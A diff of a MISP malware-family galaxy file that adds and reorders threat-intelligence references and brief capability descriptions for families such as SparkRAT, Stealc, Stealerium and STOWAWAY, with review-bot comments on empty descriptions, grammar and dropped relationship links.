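Review bot: the new win.somnia entry lands with an empty "description" even though it references a Walmart Global Tech write-up; if that post characterises the family, a one-sentence summary prefixed "According to Walmart Global Tech, ..." (the convention the other entries in this file use) would make the cluster useful in a MISP UI. Also confirm that uuid 907ed2ce-5407-4e4d-9b1a-596d5489b008 is freshly generated and not already used elsewhere in the galaxy.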
@@ -42719,9 +45011,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
"https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
- "https://securelist.com/apt-trends-report-q3-2020/99204/"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a"
],
"synonyms": [],
"type": []
@@ -42734,8 +45026,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu",
- "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
],
"synonyms": [],
"type": []
@@ -42748,7 +45040,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.soul",
- "https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware"
+ "https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware",
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/"
],
"synonyms": [
"SoulSearcher"
@@ -42763,15 +45056,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite",
- "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
- "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
- "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
"https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf",
- "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://attack.mitre.org/wiki/Software/S0157",
"https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
+ "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx",
+ "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
],
"synonyms": [
"denis"
@@ -42786,8 +45079,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
"synonyms": [],
"type": []
@@ -42800,11 +45093,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spark",
- "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one",
+ "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
"https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
"https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
- "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
- "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
+ "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one"
],
"synonyms": [],
"type": []
@@ -42838,6 +45131,22 @@
"uuid": "1937c3e0-569d-4eb4-b769-ae5d9cc27755",
"value": "Sparksrv"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark_rat",
+ "https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/",
+ "https://blog.exatrack.com/melofee/",
+ "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/",
+ "https://github.com/XZB-1248/Spark"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "55c6dce3-650b-4f67-8b47-5f6cd0acb72c",
+ "value": "SparkRAT"
+ },
{
"description": "",
"meta": {
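Review bot: win.spark_rat is added with an empty "description" although the refs include the tool's own GitHub repository (XZB-1248/Spark) and a SentinelOne analysis, either of which could supply the usual "According to ..." summary. Please also double-check that the Microsoft ZeroBot post listed here actually covers SparkRAT rather than mentioning it in passing; refs that only touch a family add noise to the cluster.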
@@ -42893,6 +45202,19 @@
"uuid": "bd29030e-d440-4842-bc2a-c173ed938da4",
"value": "Spedear"
},
+ {
+ "description": "According to Trend Micro, this is a tool designed to disable security products, adopting two approaches to achieve this purpose. One approach terminates the security product process by using a vulnerable driver, zamguard64.sys, published by Zemana (vulnerability designated as CVE-2018-5713). Meanwhile, another approach disables process launching by using a new technique that they named stack rumbling.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker",
+ "https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "24541e4c-27b3-4a80-9dca-972f9825d36b",
+ "value": "SPHijacker"
+ },
{
"description": "",
"meta": {
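Review bot: in the new win.sphijacker description, "a new technique that they named stack rumbling" leaves "they" ambiguous between Trend Micro and the Earth Longzhi actor; since the sentence opens "According to Trend Micro", rewording to "a technique Trend Micro calls stack rumbling" (or naming whoever coined the term) removes the ambiguity. "Meanwhile, another approach" would also read better as "The second approach".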
@@ -42911,8 +45233,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spider_rat",
+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf",
"https://twitter.com/nahamike01/status/1471496800582664193?s=20",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf"
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
@@ -42925,12 +45248,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom",
- "https://github.com/MinervaLabsResearch/SporaVaccination",
- "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/",
- "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas",
- "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware",
"https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/",
- "http://malware-traffic-analysis.net/2017/01/17/index2.html"
+ "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware",
+ "https://github.com/MinervaLabsResearch/SporaVaccination",
+ "http://malware-traffic-analysis.net/2017/01/17/index2.html",
+ "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/",
+ "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas"
],
"synonyms": [],
"type": []
@@ -42955,13 +45278,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
"https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
- "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf",
+ "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
"https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive",
- "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
- "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
- "https://vms.drweb.com/virus/?i=23648386"
+ "https://vms.drweb.com/virus/?i=23648386",
+ "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf",
+ "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf"
],
"synonyms": [],
"type": []
@@ -42974,18 +45298,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/",
- "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
"https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html",
"https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/",
"http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html",
- "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
"https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html",
- "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot",
- "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/"
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye",
+ "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/",
+ "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/",
+ "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot"
],
"synonyms": [],
"type": []
@@ -42998,30 +45322,30 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle",
- "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/",
- "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
- "https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://twitter.com/Max_Mal_/status/1442496131410190339",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://redcanary.com/blog/intelligence-insights-december-2021",
- "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader",
- "https://www.cynet.com/understanding-squirrelwaffle/",
- "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
- "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/",
- "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
- "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
"https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
- "https://www.youtube.com/watch?v=9X2P7aFKSw0",
- "https://twitter.com/jhencinski/status/1464268732096815105",
+ "https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://twitter.com/Max_Mal_/status/1442496131410190339",
+ "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
+ "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
+ "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
+ "https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
+ "https://www.cynet.com/understanding-squirrelwaffle/",
+ "https://redcanary.com/blog/intelligence-insights-december-2021",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/",
"https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan",
- "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
- "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/",
+ "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
"https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://www.youtube.com/watch?v=9X2P7aFKSw0",
"https://security-soup.net/squirrelwaffle-maldoc-analysis/",
- "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf"
+ "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
+ "https://twitter.com/jhencinski/status/1464268732096815105",
+ "https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/",
+ "https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/"
],
"synonyms": [
"DatopLoader"
@@ -43064,9 +45388,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
],
"synonyms": [],
"type": []
@@ -43079,8 +45403,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq",
- "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers",
- "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html"
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html",
+ "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers"
],
"synonyms": [],
"type": []
@@ -43100,15 +45424,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "50eb8c54-5828-11e8-8d6b-232bb9329fc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8c38460b-fcfd-434e-b258-875854c6aff6",
"value": "StalinLocker"
},
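Review bot: this hunk silently drops the whole "related" block of win.stalinlocker, i.e. the "similar" link to dest-uuid 50eb8c54-5828-11e8-8d6b-232bb9329fc0 with its estimative-language tag, and the next hunk does the same for win.starsypound (dest-uuid d0220108-48d7-4056-babc-189048f37a59). If the relationships were pruned on purpose (for example because the target clusters were merged or retired), the commit message should say so; if the regeneration script simply no longer emits "related", that is a regression that loses cross-cluster links and should be fixed before merging.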
@@ -43161,15 +45476,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d0220108-48d7-4056-babc-189048f37a59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a",
"value": "StarsyPound"
},
@@ -43193,9 +45499,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog",
- "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html",
"https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
+ "https://twitter.com/ESETresearch/status/1433819369784610828",
"https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive"
],
"synonyms": [],
@@ -43209,10 +45515,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit",
- "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
"https://twitter.com/r3c0nst/status/1425875923606310913",
+ "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
+ "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/"
+ "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool"
],
"synonyms": [
"Corrempa"
@@ -43222,6 +45529,34 @@
"uuid": "b98c86d4-1eee-490e-a6f9-e9559322fec8",
"value": "StealBit"
},
+ {
+ "description": "Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.\r\n\r\nStealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc",
+ "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/",
+ "https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "58a2c661-470e-438d-bea3-bff1ed987ed2",
+ "value": "Stealc"
+ },
+ {
+ "description": "According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium",
+ "https://github.com/Stealerium/Stealerium",
+ "https://resources.securityscorecard.com/research/stealerium-detailed-analysis"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bf71f246-7382-486d-996d-c2b7aa8cf89b",
+ "value": "Stealerium"
+ },
{
"description": "According to PTSecurity, this stealer harvests system information which is then RC4 encrypted and Base64 encoded before sending it to the C2 server.",
"meta": {
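Review bot: both new descriptions carry copy errors that should be fixed before they are published. In win.stealc, "its development is relied on other prominent stealers" should read "its development relies on other prominent stealers", "targets date from web browsers" should be "targets data from web browsers", and "Desktop application of cryptocurrency wallets" should be "desktop applications of cryptocurrency wallets"; the text also mixes "Stealc" and "stealc", so pick one spelling. In win.stealerium, "The malware also embedded a keylogger module" should be "The malware also embeds a keylogger module".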
@@ -43237,7 +45572,7 @@
"value": "Stealer0x3401"
},
{
- "description": "",
+ "description": "According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker",
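Review bot: the new win.stealthworker description has a stray apostrophe ("Hacker's commonly take advantage" should be "Hackers commonly take advantage"), and its last three sentences are generic background on CMS brute forcing rather than a description of the malware. Trimming to the first two sentences, which actually describe StealthWorker, would keep the entry as focused as the other "According to ..." descriptions in this file.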
@@ -43293,12 +45628,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -43311,23 +45647,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stop",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list",
- "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/",
- "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
"https://securelist.com/keypass-ransomware/87412/",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
"https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/",
- "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads",
- "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/",
+ "https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
"https://angle.ankura.com/post/102het9/the-stop-ransomware-variant",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
"https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
"https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://intel471.com/blog/privateloader-malware"
+ "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads",
+ "https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
+ "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/"
],
"synonyms": [
"Djvu",
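Review bot: one of the lines this hunk re-emits for win.stop, "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads", has a 1970/01 date segment and a leading dash in the slug that look like an unset Unix-epoch timestamp in the source site's URL scheme; worth checking that it still resolves and replacing it with the canonical URL if it does not. The two genuine additions here (the G DATA "malware-vaccines" post and the Team Cymru "seychelles" post) are fine.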
@@ -43338,6 +45676,34 @@
"uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd",
"value": "STOP"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind",
+ "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "98d5a891-f4dd-4c87-a019-1f1e7ab59301",
+ "value": "Stormwind"
+ },
+ {
+ "description": "According to Mandiant, STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway",
+ "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government",
+ "https://blog.exatrack.com/melofee/",
+ "https://github.com/ph4ntonn/Stowaway"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cd187108-c557-42f8-8e48-1993abb37720",
+ "value": "STOWAWAY"
+ },
{
"description": "",
"meta": {
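Review bot: win.stormwind is added with an empty "description" even though the Securelist DeathStalker/Janicab article is its only non-Malpedia reference, so a one-line "According to Kaspersky, ..." summary would be easy to add. In the win.stowaway description, "several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering" reads as fragments; "several transport types, such as SSH and SOCKS5; the backdoor component supports file upload and download, a remote shell and basic information gathering" keeps the same facts and is grammatical.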
@@ -43350,15 +45716,28 @@
"uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2",
"value": "Stration"
},
+ {
